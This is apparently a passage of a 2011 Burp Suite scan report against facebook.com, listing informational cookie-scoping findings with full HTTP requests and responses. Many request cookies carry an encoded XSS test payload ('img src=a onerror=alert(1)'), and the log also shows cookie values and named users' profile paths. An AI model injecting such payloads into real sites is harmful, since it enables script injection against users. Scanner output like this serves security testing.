Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.41. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.42. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.43. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.44. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
  • next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0


10.45. http://www.facebook.com/izaOllie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.46. http://www.facebook.com/jezzas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.47. http://www.facebook.com/kimberly.christ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.48. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.49. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.50. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
  • next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.51. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; 